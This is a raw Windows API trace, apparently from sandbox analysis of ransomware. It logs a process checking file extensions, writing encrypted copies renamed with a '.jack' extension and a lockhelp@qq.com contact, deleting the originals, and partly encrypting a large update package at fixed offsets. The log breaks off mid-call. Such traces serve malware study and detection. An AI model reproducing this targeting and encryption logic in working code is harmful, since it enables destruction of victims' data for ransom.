[0201.519] lstrlenW (lpString=".1cd") returned 4 [0201.519] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0201.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.519] lstrlenW (lpString=".jpg") returned 4 [0201.519] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0201.520] lstrcmpiW (lpString1=".exe", lpString2=".jack") returned -1 [0201.520] lstrlenW (lpString="SetupUtility.exe") returned 16 [0201.520] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0201.520] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=96088) returned 1 [0201.520] CloseHandle (hObject=0x40c) returned 1 [0201.520] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 0x80 [0201.521] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.521] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0201.521] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.521] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.521] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0201.521] GetLastError () returned 0x0 [0201.521] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x17758, lpOverlapped=0x0) returned 1 [0201.525] WriteFile (in: hFile=0x3f4, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x17760, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x17760, lpOverlapped=0x0) returned 1 [0201.527] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.527] WriteFile (in: hFile=0x3f4, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xf4, lpOverlapped=0x0) returned 1 [0201.527] SetEndOfFile (hFile=0x3f4) returned 1 [0201.528] CloseHandle (hObject=0x3f4) returned 1 [0201.531] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.531] SetEndOfFile (hFile=0x40c) returned 1 [0201.533] CloseHandle (hObject=0x40c) returned 1 [0201.533] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0201.533] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 1 [0201.533] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.533] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.534] lstrlenW (lpString=".doc") returned 4 [0201.534] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0201.534] lstrlenW (lpString=".docx") returned 5 [0201.534] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0201.534] lstrlenW (lpString=".pdf") returned 4 [0201.534] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0201.534] lstrlenW (lpString=".xls") returned 4 [0201.534] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0201.534] lstrlenW (lpString=".xlsx") returned 5 [0201.534] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0201.534] lstrlenW (lpString=".ppt") returned 4 [0201.534] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0201.534] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.534] lstrlenW (lpString=".zip") returned 4 [0201.534] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0201.534] lstrlenW (lpString=".rar") returned 4 [0201.534] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0201.534] lstrlenW (lpString=".bz2") returned 4 [0201.534] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0201.534] lstrlenW (lpString=".7z") returned 3 [0201.534] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0201.534] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.534] lstrlenW (lpString=".dbf") returned 4 [0201.534] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0201.534] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.534] lstrlenW (lpString=".1cd") returned 4 [0201.534] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0201.534] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.534] lstrlenW (lpString=".jpg") returned 4 [0201.535] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0201.535] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.535] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.535] lstrlenW (lpString=".doc") returned 4 [0201.535] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0201.535] lstrlenW (lpString=".docx") returned 5 [0201.535] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0201.535] lstrlenW (lpString=".pdf") returned 4 [0201.535] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0201.535] lstrlenW (lpString=".xls") returned 4 [0201.535] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0201.535] lstrlenW (lpString=".xlsx") returned 5 [0201.535] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0201.535] lstrlenW (lpString=".ppt") returned 4 [0201.535] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0201.535] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.535] lstrlenW (lpString=".zip") returned 4 [0201.535] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0201.535] lstrlenW (lpString=".rar") returned 4 [0201.535] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0201.535] lstrlenW (lpString=".bz2") returned 4 [0201.535] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0201.535] lstrlenW (lpString=".7z") returned 3 [0201.535] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0201.535] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.535] lstrlenW (lpString=".dbf") returned 4 [0201.535] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0201.535] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.536] lstrlenW (lpString=".1cd") returned 4 [0201.536] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0201.536] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0201.536] lstrlenW (lpString=".jpg") returned 4 [0201.536] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0201.536] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0201.536] lstrlenW (lpString="sqmapi.dll") returned 10 [0201.536] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0201.536] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=144416) returned 1 [0201.536] CloseHandle (hObject=0x40c) returned 1 [0201.536] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 0x80 [0201.536] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.537] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0201.537] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.537] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.537] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0201.537] GetLastError () returned 0x0 [0201.537] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x23420, lpOverlapped=0x0) returned 1 [0201.541] WriteFile (in: hFile=0x3f4, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x23430, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x23430, lpOverlapped=0x0) returned 1 [0201.544] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.544] WriteFile (in: hFile=0x3f4, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xe8, lpOverlapped=0x0) returned 1 [0201.544] SetEndOfFile (hFile=0x3f4) returned 1 [0201.544] CloseHandle (hObject=0x3f4) returned 1 [0201.548] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.548] SetEndOfFile (hFile=0x40c) returned 1 [0201.550] CloseHandle (hObject=0x40c) returned 1 [0201.550] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0201.550] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 1 [0201.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.551] lstrlenW (lpString=".doc") returned 4 [0201.551] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.551] lstrlenW (lpString=".docx") returned 5 [0201.551] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0201.551] lstrlenW (lpString=".pdf") returned 4 [0201.551] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.551] lstrlenW (lpString=".xls") returned 4 [0201.551] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.551] lstrlenW (lpString=".xlsx") returned 5 [0201.551] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0201.551] lstrlenW (lpString=".ppt") returned 4 [0201.551] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.551] lstrlenW (lpString=".zip") returned 4 [0201.551] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.551] lstrlenW (lpString=".rar") returned 4 [0201.551] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.551] lstrlenW (lpString=".bz2") returned 4 [0201.551] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.551] lstrlenW (lpString=".7z") returned 3 [0201.551] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.551] lstrlenW (lpString=".dbf") returned 4 [0201.551] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.551] lstrlenW (lpString=".1cd") returned 4 [0201.551] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.551] lstrlenW (lpString=".jpg") returned 4 [0201.552] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.552] lstrlenW (lpString=".doc") returned 4 [0201.552] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.552] lstrlenW (lpString=".docx") returned 5 [0201.552] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0201.552] lstrlenW (lpString=".pdf") returned 4 [0201.552] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.552] lstrlenW (lpString=".xls") returned 4 [0201.552] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.552] lstrlenW (lpString=".xlsx") returned 5 [0201.552] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0201.552] lstrlenW (lpString=".ppt") returned 4 [0201.552] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.552] lstrlenW (lpString=".zip") returned 4 [0201.552] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.552] lstrlenW (lpString=".rar") returned 4 [0201.552] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.552] lstrlenW (lpString=".bz2") returned 4 [0201.552] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.552] lstrlenW (lpString=".7z") returned 3 [0201.552] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.552] lstrlenW (lpString=".dbf") returned 4 [0201.552] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.552] lstrlenW (lpString=".1cd") returned 4 [0201.552] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.553] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0201.553] lstrlenW (lpString=".jpg") returned 4 [0201.553] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.553] lstrcmpiW (lpString1=".msu", lpString2=".jack") returned 1 [0201.553] lstrlenW (lpString="Windows6.0-KB956250-v6001-x64.msu") returned 33 [0201.553] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0203.138] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=5198099) returned 1 [0203.138] CloseHandle (hObject=0x438) returned 1 [0203.138] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu")) returned 0x80 [0203.138] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0203.138] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0203.139] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0203.139] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc64 | out: lpNewFilePointer=0x0) returned 1 [0203.139] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc24 | out: lpNewFilePointer=0x0) returned 1 [0203.139] ReadFile (in: hFile=0x438, lpBuffer=0x3ce8058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a1fc30, lpOverlapped=0x0 | out: lpBuffer=0x3ce8058*, lpNumberOfBytesRead=0x2a1fc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.624] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc24 | out: lpNewFilePointer=0x0) returned 1 [0203.624] ReadFile (in: hFile=0x438, lpBuffer=0x3d28058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a1fc30, lpOverlapped=0x0 | out: lpBuffer=0x3d28058*, lpNumberOfBytesRead=0x2a1fc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.626] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2a1fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0203.626] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc24 | out: lpNewFilePointer=0x0) returned 1 [0203.626] ReadFile (in: hFile=0x438, lpBuffer=0x3d68058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a1fc30, lpOverlapped=0x0 | out: lpBuffer=0x3d68058*, lpNumberOfBytesRead=0x2a1fc30*=0x40000, lpOverlapped=0x0) returned 1 [0203.640] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.640] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x2a1fca8, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0204.097] SetEndOfFile (hFile=0x438) returned 1 [0204.097] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x4041e30 [0204.097] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc74 | out: lpNewFilePointer=0x0) returned 1 [0204.097] WriteFile (in: hFile=0x438, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a1fc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x2a1fc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.098] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc74 | out: lpNewFilePointer=0x0) returned 1 [0204.098] WriteFile (in: hFile=0x438, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a1fc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x2a1fc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.100] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc74 | out: lpNewFilePointer=0x0) returned 1 [0204.100] WriteFile (in: hFile=0x438, lpBuffer=0x4041e30*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a1fc80, lpOverlapped=0x0 | out: lpBuffer=0x4041e30*, lpNumberOfBytesWritten=0x2a1fc80*=0x40000, lpOverlapped=0x0) returned 1 [0204.102] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4041e30 | out: hHeap=0x5e0000) returned 1 [0204.102] CloseHandle (hObject=0x438) returned 1 [0205.341] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0205.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.342] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.342] lstrlenW (lpString=".doc") returned 4 [0205.342] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0205.342] lstrlenW (lpString=".docx") returned 5 [0205.342] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0205.342] lstrlenW (lpString=".pdf") returned 4 [0205.342] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0205.342] lstrlenW (lpString=".xls") returned 4 [0205.342] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0205.342] lstrlenW (lpString=".xlsx") returned 5 [0205.342] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0205.342] lstrlenW (lpString=".ppt") returned 4 [0205.342] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0205.342] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.342] lstrlenW (lpString=".zip") returned 4 [0205.342] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0205.342] lstrlenW (lpString=".rar") returned 4 [0205.342] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0205.342] lstrlenW (lpString=".bz2") returned 4 [0205.342] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0205.342] lstrlenW (lpString=".7z") returned 3 [0205.342] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0205.342] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.342] lstrlenW (lpString=".dbf") returned 4 [0205.342] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0205.342] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.342] lstrlenW (lpString=".1cd") returned 4 [0205.342] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0205.342] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.342] lstrlenW (lpString=".jpg") returned 4 [0205.343] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0205.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.343] lstrlenW (lpString=".doc") returned 4 [0205.343] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0205.343] lstrlenW (lpString=".docx") returned 5 [0205.343] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0205.343] lstrlenW (lpString=".pdf") returned 4 [0205.343] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0205.343] lstrlenW (lpString=".xls") returned 4 [0205.343] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0205.343] lstrlenW (lpString=".xlsx") returned 5 [0205.343] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0205.343] lstrlenW (lpString=".ppt") returned 4 [0205.343] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0205.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.343] lstrlenW (lpString=".zip") returned 4 [0205.343] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0205.343] lstrlenW (lpString=".rar") returned 4 [0205.343] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0205.343] lstrlenW (lpString=".bz2") returned 4 [0205.343] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0205.343] lstrlenW (lpString=".7z") returned 3 [0205.343] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0205.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.343] lstrlenW (lpString=".dbf") returned 4 [0205.343] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0205.343] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.344] lstrlenW (lpString=".1cd") returned 4 [0205.344] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0205.344] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0205.344] lstrlenW (lpString=".jpg") returned 4 [0205.344] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0205.344] lstrcmpiW (lpString1=".ttf", lpString2=".jack") returned 1 [0205.344] lstrlenW (lpString="meiryon_boot.ttf") returned 16 [0205.344] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 